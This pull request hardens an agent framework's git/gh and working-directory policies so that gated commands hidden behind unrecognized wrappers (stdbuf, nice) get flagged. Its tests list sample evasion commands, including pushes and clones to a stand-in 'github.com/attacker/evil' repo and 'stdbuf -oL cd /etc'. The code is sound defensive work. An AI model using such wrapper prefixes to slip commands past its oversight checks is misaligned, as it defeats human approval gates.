### PR TITLE
Surface git/gh/cd commands hidden behind unrecognized wrappers

### DIFF
--- a/omnigent/policies/builtins/github.py
+++ b/omnigent/policies/builtins/github.py
@@ -768,6 +768,37 @@ def _classify_gh_api(rest: list[str], repo: str | None) -> _ShellOp:
     )
 
 
+def _segment_hides_gated_invocation(tokens: list[str]) -> bool:
+    """
+    Whether a gated git/gh invocation sits behind an unrecognized leading token.
+
+    :func:`real_invocation_tokens` only strips the command wrappers we know
+    about; one we don't (``stdbuf``, ``nice``, ``timeout`` …) leaves the real
+    ``git`` / ``gh`` command deeper in the token list, where the first-token
+    dispatch in :func:`_classify_shell_command` misses it and the segment is
+    silently allowed. This is the fail-closed backstop: spot a ``git
+    <remote-subcmd>`` or ``gh <non-ignored-group>`` token pair anywhere past the
+    first token so the caller can surface it for approval instead.
+
+    Matching on a *command + subcommand* token pair (not a bare mention) keeps
+    benign text like ``echo "git push later"`` — one quoted token, no adjacent
+    pair — from tripping the gate.
+
+    :param tokens: Real-invocation tokens of a segment whose leading token was
+        not itself recognized as ``git`` / ``gh``.
+    :returns: ``True`` if a gated git/gh invocation appears behind the leading
+        token, else ``False``.
+    """
+    gated_git = _GIT_READ_SUBCMDS | _GIT_WRITE_SUBCMDS
+    for i in range(1, len(tokens) - 1):
+        word, following = tokens[i], tokens[i + 1]
+        if word == "git" and following in gated_git:
+            return True
+        if word == "gh" and not following.startswith("-") and following not in _GH_IGNORE_GROUPS:
+            return True
+    return False
+
+
 def _classify_shell_command(command: str, _depth: int = 0) -> list[_ShellOp]:
     """
     Parse a shell command string into the git / gh remote ops it performs.
@@ -782,8 +813,9 @@ def _classify_shell_command(command: str, _depth: int = 0) -> list[_ShellOp]:
         leave it 0.
     :returns: One :class:`_ShellOp` per git/gh remote invocation found. Local
         git commands and non-git/gh segments produce no op. A segment that
-        starts with git/gh but cannot be tokenized yields an ``"unparseable"``
-        op so the caller can ASK rather than silently allow.
+        starts with git/gh but cannot be tokenized — or hides a gated git/gh
+        invocation behind an unrecognized leading wrapper — yields an
+        ``"unparseable"`` op so the caller can ASK rather than silently allow.
     """
     if _depth > MAX_SHELL_NESTING:
         return []
@@ -818,6 +850,16 @@ def _classify_shell_command(command: str, _depth: int = 0) -> list[_ShellOp]:
             op = _classify_git(tokens)
         elif tokens[0] == "gh":
             op = _classify_gh(tokens)
+        elif _segment_hides_gated_invocation(tokens):
+            # An unrecognized leading wrapper hides a real git/gh invocation —
+            # fail closed (ASK) rather than let it through unchecked.
+            op = _ShellOp(
+                kind="unparseable",
+                repo=None,
+                branches=frozenset(),
+                branch_targeted=False,
+                detail=segment[:60],
+            )
         else:
             op = None
         if op is not None:

--- a/omnigent/policies/builtins/working_dir.py
+++ b/omnigent/policies/builtins/working_dir.py
@@ -224,6 +224,37 @@ def _classify_segment(tokens: list[str], block_cd: bool, block_worktree: bool) -
     return None
 
 
+def _segment_hides_gated_command(tokens: list[str], block_cd: bool, block_worktree: bool) -> bool:
+    """
+    Whether a gated cd/worktree command sits behind an unrecognized leading token.
+
+    :func:`real_invocation_tokens` only strips known command wrappers; an
+    unknown one (``stdbuf``, ``nice`` …) leaves a real ``cd`` / ``git -C`` /
+    ``git worktree`` deeper in the token list, where the head dispatch in
+    :func:`_classify_segment` misses it and the segment is silently allowed.
+    This is the fail-closed backstop, matching on actual command tokens (not a
+    bare mention, so a quoted ``echo "cd /etc"`` stays one token and does not
+    trip it).
+
+    :param tokens: Real-invocation tokens of a segment whose leading token was
+        not itself a recognized gated command.
+    :param block_cd: Whether directory-change commands are gated.
+    :param block_worktree: Whether worktree-switch commands are gated.
+    :returns: ``True`` if a gated command appears behind the leading token.
+    """
+    for i in range(1, len(tokens)):
+        word = tokens[i].lstrip("(")
+        if block_cd and word in _CD_COMMANDS:
+            return True
+        if word == "git":
+            rest = tokens[i + 1 :]
+            if block_worktree and "worktree" in rest:
+                return True
+            if block_cd and any(t == "-C" or t.startswith("-C") for t in rest):
+                return True
+    return False
+
+
 def _looks_like_dir_op(segment: str, block_cd: bool, block_worktree: bool) -> bool:
     """
     Heuristic: does an un-tokenizable segment appear to switch dir/worktree?
@@ -373,6 +404,16 @@ def block_working_dir_changes(
             op = _classify_segment(tokens, block_cd, block_worktree)
             if op is not None:
                 worst = _worse(worst, _gate(op))
+            elif _segment_hides_gated_command(tokens, block_cd, block_worktree):
+                # An unrecognized leading wrapper hides a gated cd/worktree
+                # command — fail closed via the configured action.
+                worst = _worse(
+                    worst,
+                    _violation(
+                        f"Blocked: a shell command ({segment[:60]!r}) appears to switch "
+                        f"directories or worktrees behind an unrecognized wrapper."
+                    ),
+                )
         return worst
 
     def _evaluate(event: PolicyEvent) -> PolicyResponse | None:

--- a/tests/policies/builtins/test_github.py
+++ b/tests/policies/builtins/test_github.py
@@ -435,6 +435,48 @@ def test_shell_unparseable_git_command_asks() -> None:
     assert result is not None and result["result"] == "ASK"
 
 
+@pytest.mark.parametrize(
+    "command",
+    [
+        # An unrecognized leading wrapper (not in CMD_WRAPPERS) keeps the git/gh
+        # invocation out of first-token position; it must still be surfaced.
+        "stdbuf -oL git push https://github.com/attacker/evil main",
+        "nice -n 5 git push https://github.com/attacker/evil main",
+        "nice git clone https://github.com/attacker/evil",
+    ],
+)
+def test_shell_gated_command_behind_unknown_wrapper_asks(command: str) -> None:
+    """A git/gh invocation hidden behind an unrecognized wrapper fails closed.
+
+    The first-token dispatch only recognizes a leading ``git`` / ``gh``; an
+    unknown wrapper in front would otherwise make the segment produce no op and
+    pass through. The fail-closed backstop detects the gated invocation and
+    ASKs instead of silently allowing it.
+    """
+    policy = github_policy(write_repos=[_REPO], write_branches=["main"])
+    result = policy(_sh(command))
+    assert result is not None and result["result"] == "ASK"
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "echo 'remember to git push later'",  # gated words inside a quoted string
+        "git status",  # local git command, not a gated remote op
+        "npm run gh-pages",  # 'gh' only as a substring, not a command
+    ],
+)
+def test_shell_benign_mentions_do_not_fail_closed(command: str) -> None:
+    """The fail-closed backstop does not trip on benign mentions of git/gh.
+
+    Matching a command+subcommand token pair (not a bare substring) keeps
+    quoted mentions, local git commands, and unrelated tokens from producing a
+    spurious ASK.
+    """
+    policy = github_policy(write_repos=[_REPO], write_branches=["main"])
+    assert policy(_sh(command)) is None
+
+
 def test_shell_tools_param_overrides_default_tool() -> None:
     """A custom shell tool name is parsed when listed in ``shell_tools``.
 

--- a/tests/policies/builtins/test_working_dir.py
+++ b/tests/policies/builtins/test_working_dir.py
@@ -301,6 +301,45 @@ def test_untokenizable_gated_segment_surfaces_action() -> None:
     assert result is not None and result["result"] == "DENY"
 
 
+@pytest.mark.parametrize(
+    "command",
+    [
+        # Unrecognized leading wrappers (not in CMD_WRAPPERS) keep the gated
+        # command out of head position; it must still be surfaced.
+        "stdbuf -oL cd /etc",
+        "nice git -C /etc status",
+        "nice git worktree add /tmp/wt",
+    ],
+)
+def test_gated_command_behind_unknown_wrapper_surfaces_action(command: str) -> None:
+    """A cd/worktree command hidden behind an unrecognized wrapper fails closed.
+
+    The head dispatch only recognizes a leading cd-family / ``git`` command; an
+    unknown wrapper in front would otherwise make the segment produce no op and
+    pass through. The fail-closed backstop detects it and applies the action.
+    """
+    policy = block_working_dir_changes()
+    result = policy(_sh(command))
+    assert result is not None and result["result"] == "DENY"
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "echo 'cd /etc'",  # gated word inside a quoted string, not a command
+        "ls -la",  # no gated command at all
+    ],
+)
+def test_benign_mentions_do_not_fail_closed(command: str) -> None:
+    """The fail-closed backstop does not trip on benign mentions of a cd command.
+
+    Matching actual command tokens (not a bare substring) keeps quoted mentions
+    and unrelated commands from producing a spurious DENY.
+    """
+    policy = block_working_dir_changes(allowed_dirs=["/workspace"])
+    assert policy(_sh(command)) is None
+
+
 # ══════════════════════════════════════════════════════════════════════════════
 # Layer 1 — abstention (composition) and tool selection
 # ══════════════════════════════════════════════════════════════════════════════


### PR DESCRIPTION
## Summary
- The `github` and `working_dir` policies dispatch on a command segment's first token, so a gated `git`/`gh`/`cd` command sitting behind a wrapper they don't strip (e.g. `stdbuf`, `nice`) produced no op and passed through.
- Adds a backstop: when the leading token isn't recognized but a git/gh remote command or a cd/worktree command appears behind it, the segment is surfaced for the policy's action instead of being silently allowed.
- Detection matches a command+subcommand token pair (not a bare substring), so quoted mentions (`echo "git push later"`), local commands (`git status`), and unrelated tokens (`npm run gh-pages`) are unaffected.

**ELI5:** these policies decide whether to allow a shell command by looking at the first word. If you put another word in front, the real command moved out of first place and went unnoticed. This adds a second look further along the line so a recognizable command behind a prefix still gets checked — while plain text that merely mentions those words is left alone.

## Type of change
- [x] Bug fix
- [ ] Feature
- [ ] Refactor / chore
- [ ] Docs
- [ ] Test / CI
- [ ] Breaking change

## Test coverage
- [x] Unit tests added / updated
- [ ] Integration tests added / updated
- [ ] E2E tests added / updated
- [ ] Manual verification completed
- [ ] Existing tests cover this change
- [ ] Not applicable

## Coverage rationale
Added parametrized unit tests in both `tests/policies/builtins/test_github.py` and `tests/policies/builtins/test_working_dir.py` covering commands hidden behind an unrecognized wrapper (surfaced) and benign mentions (not surfaced). Ran `uv run pytest tests/policies/builtins/test_github.py tests/policies/builtins/test_working_dir.py` — all pass (123). `ruff check` and `ruff format --check` clean on the changed files.